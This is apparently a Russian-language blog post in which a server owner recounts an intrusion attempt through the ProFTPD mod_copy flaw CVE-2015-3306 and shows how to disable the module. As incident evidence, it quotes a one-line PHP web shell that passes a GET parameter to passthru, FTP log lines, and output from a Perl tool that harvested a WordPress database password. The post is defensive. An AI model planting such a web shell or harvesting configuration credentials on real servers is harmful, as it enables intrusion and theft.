Попытка взлома моего сервера через уязвимость CVE: 2015-3306 в ProFTPD

В один прекрасный день я обнаружил в корневой директории одного из моих сайтов файл со странным именем d.php:
d.php

Помня, что такой файл я не создавал, я решил посмотреть его содержимое:
d.php
passthru($_GET['cmd']);echo 'm3rg3'; — очень занятно.
Код passthru($_GET['cmd']); позволяет выполнять команды с привилегиями сервера, cmd — имя переменной, в которой передается методом GET выполняемый код

213.92.207.124 — IP-адрес из диапазона польского провайдера Polprint.

Посмотрим в логи сервера ProFTPD, упомянутого в этом файле, и поищем что же там есть за этот айпишник 🙂 :

2015-09-07 14:09:31,876 foxylab proftpd[28321] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): FTP session opened.
2015-09-07 14:09:32,692 foxylab proftpd[28321] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): FTP session closed.
...
2015-09-07 14:11:46,542 foxylab proftpd[28394] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): FTP session opened.
2015-09-07 14:11:46,646 foxylab proftpd[28394] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): error opening destination file '/.../d.php' for copying: Permission denied
2015-09-07 14:11:46,781 foxylab proftpd[28394] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): error opening destination file '/.../d.php' for copying: Permission denied
2015-09-07 14:11:46,916 foxylab proftpd[28394] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): error opening destination file '/.../d.php' for copying: Permission denied
2015-09-07 14:11:47,052 foxylab proftpd[28394] foxylab.com (213-92-207-124.serv-net.pl[213.92.207.124]): FTP session closed.

Интересно… В содержимом файла d.php упоминается директория /tmp. Заглянем и туда. Да тут же самое логово:
tmp

Любители Perl, понимаешь )))
В файле pass заботливо записан пароль от базы данных моего блога 😉 :

[o]=================================================[x]
|            confspy.pl v1.0 by Vrs-hCk             |
|             ander[at]antisecurity.org             |
|       www.mainhack.net - www.antisecurity.org     |
[o]=================================================[o]
Log Created : Wed Sep  9 17:31:49 2015
[+] Total users public_html    : 31
[+] Total readable public_html : 31
[!] Searching for config files ...
[+] /.../wp-config.php
[@] W..........p   <<< пароль

Какой пафос! www.antisecurity.org ))))))))))))))))))))))))
А www.mainhack.net )))) основные ребята на районе )))))))

Итак, меняем пароли. Но это только пол-дела.

Как обезопасить себя от повторения такой ситуации в будущем?

Причина (сообщение от Vadim Melihow) — уязвимость CVE: 2015-3306 в модуле mod_copy.c сервера ProFTPD версий 1.3.x, которая позволяет выполнять команды SITE CPFR/SITE CPTO неавторизованным пользователям. Эту же команду мы видим и в d.php:
d.php

Примечание. Модуль mod_copy (автор — TJ Saunders) реализует выполнение команд SITE CPFR и SITE CPTO, которые позволяют копировать файлы/директории на сервере из одного места (задается командой SITE CPFR) в другое (задается командой SITE CPTO) без передачи данных между клиентом и сервером. Команды, конечно, полезные, но не так уж и необходимые.

Ответ простой — отключить загрузку модуля mod_copy в сервере ProFTPD.
К сожалению, во многих источниках (например, https://xakep.ru/2015/06/22/exploits-196/) заявляется: «уязвимый модуль нельзя отключить через файл конфигурации» — это неверно.
Это можно сделать и через Webmin, редактируя файл /etc/proftpd/modules.conf .
Закомментируем (#) в этом файле директиву загрузки этого модуля mod_copy:
отключение mod_copy

Затем требуется перезапустить сервер ProFTPD.

Проверим:
отключение mod_copy

Вуаля, ¡No pasarán! 🙂 .



Попытка взлома моего сервера через уязвимость CVE: 2015-3306 в ProFTPD: Один комментарий

  1. Уведомление: Determine server damage – File injected possibly through ProFTPD [duplicate] – Linux Solutions

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *